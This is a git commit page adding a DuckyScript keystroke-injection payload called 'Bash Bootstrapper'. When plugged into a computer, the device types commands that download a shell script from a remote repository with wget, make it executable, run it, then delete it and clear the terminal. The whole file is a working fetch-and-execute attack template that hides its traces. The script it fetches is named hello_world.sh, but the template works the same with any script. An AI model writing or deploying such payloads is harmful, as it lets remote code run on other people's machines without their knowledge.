add payload.dd
This commit is contained in:
parent
a8cb437df8
commit
b0eeaefdda
24
payload.dd
Normal file
24
payload.dd
Normal file
|
@ -0,0 +1,24 @@
|
|||
REM TITLE Bash Bootstrapper
|
||||
REM AUTHOR Sajenim
|
||||
REM DESCRIPTION Fetch and execute a script from remote repository
|
||||
REM VERSION 1.0
|
||||
|
||||
DELAY 200
|
||||
STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bash/hello_world.sh
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING chmod +x hello_world.sh
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING ./hello_world.sh
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING rm hello_world.sh
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING clear
|
||||
ENTER
|
Loading…
Reference in a new issue